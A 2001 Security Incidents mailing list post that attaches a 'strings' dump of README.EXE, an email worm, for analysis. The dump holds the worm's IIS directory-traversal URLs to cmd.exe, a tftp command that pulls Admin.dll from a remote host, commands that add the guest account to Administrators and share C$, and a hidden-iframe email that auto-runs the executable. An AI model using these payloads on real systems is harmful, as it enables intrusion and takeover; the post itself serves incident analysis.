Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: New worm? 'readme.eml'

From: Tony Abedini <tabedini () yahoo com>
Date: Tue, 18 Sep 2001 11:56:22 -0700 (PDT)
I've done a strings on the README.EXE file and I've
attached it AS TEXT for anyone who is interested!

__________________________________________________
Terrorist Attacks on U.S. - How can you help?
Donate cash, emergency relief information
http://dailynews.yahoo.com/fc/US/Emergency_Information/
!This program cannot be run in DOS mode.
O<Richq
.text
`.rdata
@.data
.rsrc
@.reloc
SVW3
WPWW
r?f
6VWh
X_^[
6SVWj
_^[u
_^[]
}VW
GGCC
GGCC
PSh?
SSSh
VSSS
PSSh@
PSSh@
VWh€
j@PW
69ut
X[_^
jcY;
6y.VW
6j@h
PQPW
Pj@VSW
PVSSW
6SSW
6_^3
SUVW
6_^]3
6WPWSh
WPWSh
WPWSh€
6VWS
6SShP
6VWS
6SSh0
6VWS
6SSh
6VWS
6SSh
6VWS
SPh|
6_^[
;H(}Rh
;A(}X
t0A;
\u"€}
Vh,
6_^[
SVWhD
H;L$
GY;~
9~ v
GY;~ r
QSPh
6PSj
;Et
X_^[
PVVh
X_^]
SUVW
_^][Y
SVWjY
X_^[
SVW3
Ph~f
VPVV
Ph~f
jc^W
2u€x
X_^[
D$u
D$<UP
D$@hx
D$`QPV
D$@P
D$@h
D$@h
D$@h
D$@h
D$@h
D$@h
D$@h
D$@P
D$@P
_]Vj
t`€e
@SVW
j@P3
F98t
C98u
WWW
|$$3
D$8WP
D$Dj
€|$<
D$\PWh0
D$\P
D$\h(
D$`YWPh
D$\h€
D$\WP
l$4uV
D$0j
|$0€
9T$,u<;
D$ ;
u>9T$
u89T$
u89T$
D$\P
F9T$
29T$
9T$ t
D$(u
D$\P
L$8j
QUPS
D$\P
t$(j
l$,UWjfj
D$\P
D$\P
D$TP
D$HP
D$TPU
D$ph
D$TP
D$HP
D$TPU
D$`VP
D$\P
_^][
YuOV
X_^[
SVWht
PSh0
YYSj&j
^VSP
6SSSSS
X_^[
6j.V
QQSV3
6VVj
s h€
X_^[
SUVW
t$@V
!SSj
_^][
6Wh (
6YWV
6t\h
6tUh(
6tyh
WVVV
6_^[
€8au
PVh?
VVVh8
PVVh
PVh?
WPWVh
WPWVh
6_^[
X_^[
PSh?
SSSh
PSSV
PWSV
PWSV
PWSh
6^9]
6_[t
D$@P
D$@hx
D$`QPV
D$@P
D$@h
D$@h
Yu:W
D$`QPV
WSSj
t7SV
SQWPV
<{}%<-~!</t
<@ufj
E€j@P
Ytg€}€@ta
E€VP
M€QP
6VuD
6YPS
€QVP
6j.V
Yv'€>Su"€~
th;Y sa
Yv:€>Su5€~
Mu/€~
Tu)€~
Pu#€~
^[WWW
6Wt|
SPSS
QSUV3
6uQUPP
6ubht
X_^][Y
6YSV
PVh0
_WVP
PVVVVV
X_^[
SVW
SVh0
YYVSh
VVj
t_VVh
tE95
PSh0
D$ SPh
D$ UP
D$ SP
6VSh0
6SUj
D$ P
D$ VP
D$$YP
6SUj
YPVW
X_^][
SUVW
6WUV
dWUV
D$`QPV
X_^][
X_^[
_WVP
PVVVVV
Yj&P
X_^[
^@[_
6j?P
PPh,o
QSPh
SVWj
VPVV
VPVV
6_^3
6u?h€
tWVS
NWVS
Eu
u7WPS
u&WVS
E_^[]
strncpy
memset
strcpy
strlen
strtok
memcpy
strchr
strcat
rand
strcmp
_strlwr
strncat
srand
free
sprintf
malloc
atoi
strstr
strrchr
MSVCRT.dll
_initterm
_adjust_fdiv
GetCurrentThreadId
CloseHandle
WriteFile
SetFilePointer
CreateFileA
MoveFileExA
ReadFile
SetFileAttributesA
FindClose
FindNextFileA
FindFirstFileA
WriteProcessMemory
OpenProcess
GetCurrentProcessId
lstrcmpiA
HeapCompact
Sleep
GetTickCount
SetThreadPriority
GetCurrentThread
CreateMutexA
lstrcpyA
GetComputerNameA
LocalFree
lstrlenA
LocalAlloc
CreateThread
ReleaseMutex
WaitForSingleObject
GetDriveTypeA
GetLogicalDrives
GetFileSize
CopyFileA
GetFileAttributesA
SetFileTime
GetFileTime
EndUpdateResourceA
UpdateResourceA
SizeofResource
LockResource
LoadResource
FindResourceA
FreeLibrary
BeginUpdateResourceA
LoadLibraryExA
DeleteFileA
GetTempFileNameA
CreateProcessA
GetModuleFileNameA
GetCurrentDirectoryA
GetCommandLineA
GetTempPathA
GetSystemDirectoryA
GetWindowsDirectoryA
GetModuleHandleA
GetVersionExA
GetProcAddress
LoadLibraryA
GetSystemTime
ExitProcess
HeapDestroy
GetLastError
HeapCreate
WritePrivateProfileStringA
KERNEL32.dll
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
RegEnumKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumValueA
RegSetValueExA
RegQueryValueA
ADVAPI32.dll
System\CurrentControlSet\Services\VxD\MSTCP
NameServer
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
Concept Virus(CV) V.5, Copyright(C)2001  R.P.China
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
--====_ABC1234567890DEF_====
NUL=
[rename]
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
€EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
HideFileExt
ShowSuperHidden
Hidden
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
\\%s
%ld %ld %ld
%ld %ld
Image Space Exec Write Copy
Image Space Exec Read/Write
Image Space Exec Read Only
Image Space Executable
Image Space Write Copy
Image Space Read/Write
Image Space Read Only
Image Space No Access
Mapped Space Exec Write Copy
Mapped Space Exec Read/Write
Mapped Space Exec Read Only
Mapped Space Executable
Mapped Space Write Copy
Mapped Space Read/Write
Mapped Space Read Only
Mapped Space No Access
Reserved Space Exec Write Copy
Reserved Space Exec Read/Write
Reserved Space Exec Read Only
Reserved Space Executable
Reserved Space Write Copy
Reserved Space Read/Write
Reserved Space Read Only
Reserved Space No Access
Process Address Space
Exec Write Copy
Exec Read/Write
Exec Read Only
Executable
Write Copy
Read/Write
Read Only
No Access
Image
User PC
Thread Details
ID Thread
Priority Current
Context Switches/sec
Start Address
Thread
Page Faults/sec
Virtual Bytes Peak
Virtual Bytes
Private Bytes
ID Process
Elapsed Time
Priority Base
Working Set Peak
Working Set
% User Time
% Privileged Time
% Processor Time
Process
Counter 009
software\microsoft\windows nt\currentversion\perflib\009
Counters
Version
Last Counter
software\microsoft\windows nt\currentversion\perflib
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
/Admin.dll
GET %s HTTP/1.0
Host: www
Connnection: close
readme
main
index
default
html
.asp
.htm
\readme.eml
.exe
winzip32.exe
riched20.dll
.nws
.eml
.doc
 .exe
dontrunold
ioctlsocket
gethostbyname
gethostname
inet_ntoa
inet_addr
ntohl
htonl
ntohs
htons
closesocket
select
sendto
send
recvfrom
recv
bind
connect
socket
__WSAFDIsSet
WSACleanup
WSAStartup
ws2_32.dll
MAPILogoff
MAPISendMail
MAPIFreeBuffer
MAPIReadMail
MAPIFindNext
MAPIResolveName
MAPILogon
MAPI32.DLL
WNetAddConnection2A
WNetCancelConnection2A
WNetOpenEnumA
WNetEnumResourceA
WNetCloseEnum
MPR.DLL
ShellExecuteA
SHELL32.DLL
RegisterServiceProcess
VirtualFreeEx
VirtualQueryEx
VirtualAllocEx
VirtualProtectEx
CreateRemoteThread
HeapCompact
HeapFree
HeapAlloc
HeapDestroy
HeapCreate
KERNEL32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
Type
Remark
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\X$
Parm2enc
Parm1enc
Flags
Path
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares
Cache
Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail
QUIT
Subject: 
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO 
aabbcc
 -dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
 -qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
octet
wwwwwp
pwlo
wwww
wwwwwwwwwwx
wwwwwwx
wwwwx
wwwx
lffffff
ffff
H|f
€ffff
CCCCCC
CCCCCCCCC
NPAD
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
%0C0Q0_0m0
1&1g1
2i2s2
2I3V3d3s3
4i5€5
6Y6~6
7.7H7{7
8>8J8`8e8
9!9@9W9
:!:[:d:o:
;O;U;k;
<&=2=8=E=O=^=j=
=>">)>.>E>^>
?)?0?5?@?M?T?]?|?
0'0/0C0
1!1*111:1A1J1Y1q1v1}1
1'2K2
3-343S3a3
4.494?4Q4Y4c4o4u4|4
5,515D5I5Z5_5p5u5
6,616D6I6Y6^6o6€6
7&7+7>7C7S7X7h7m7}7
8(8-8@8E8U8Z8j8o8
9*9/9B9G9W9\9l9q9
;8;A;_;h;v;
<T<d<

2>U>~>

?!?(?/?Q?X?q?
0'030?0X0}0
2<2W2t2
203I3k3~3
4+464B4U4{4
45,5>5P5b5q5
5.646H6g6n6}6
7?7Q7V7
8!8-8:8F8L8q8
929D9O9T9Z9m9v9
<5<?<M<`<f<y<
=2=O=h=

">,>@>Q>W>i>v>

?&?6?W?u?
0.0;0R0v0
02171=1Q1W1d1o1v1
2+20262A2U2`2
2.3?3V3\3k3
4$494K4a4v4
5.575J5P5u5{5
6F6k6
777}7
8-848A8N8g8w8
9 9(9-9<9D9P9X9d9l9y9
9":3:=:B:K:W:\:d:i:o:v:{:
;#;(;1;?;G;L;U;\;d;i;o;v;{;
<#<(<.<5<:<C<N<V<[<a<h<m<s<z<
=!='=.=3=9=@=E=K=R=W=]=d=i=o=v={=

.>J>v>

?.?J?\?m?
:0E0Z0x0
1)1D1{1
2&272M2d2
4!4*4@4F4O4
5-5B5R5[5o5y5
6&6I6S6e6€6
707b7
8%8:8E8R8
9*979P9p9
:7:=:F:N:X:a:m:u:|:
;;;L;o;
<N<Y<k<
=N=y=

+>1>Q>^>f>l>w>

?5?>?W?_?p?
141N1W1
1b2{2
3.3^3d3k3
41474B4H4V4^4e4j4p4
5)5>5F5R5Z5i5v5|5
6!6n6
7)757X7m7x7
8;8F8K8R8W8]8c8
9 9F9L9[9d9v9€9
;(;8;>;m;
<!<.<9<@<_<q<
=+=1=y=

V>\>r>x>

?#?;?B?M?T?z?
0v0~0
1 1'141K1d1j1~1
1#2B2`2t2
3%373I3t3{3
4 4+484@4N4S4X4]4h4u4
465R5


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: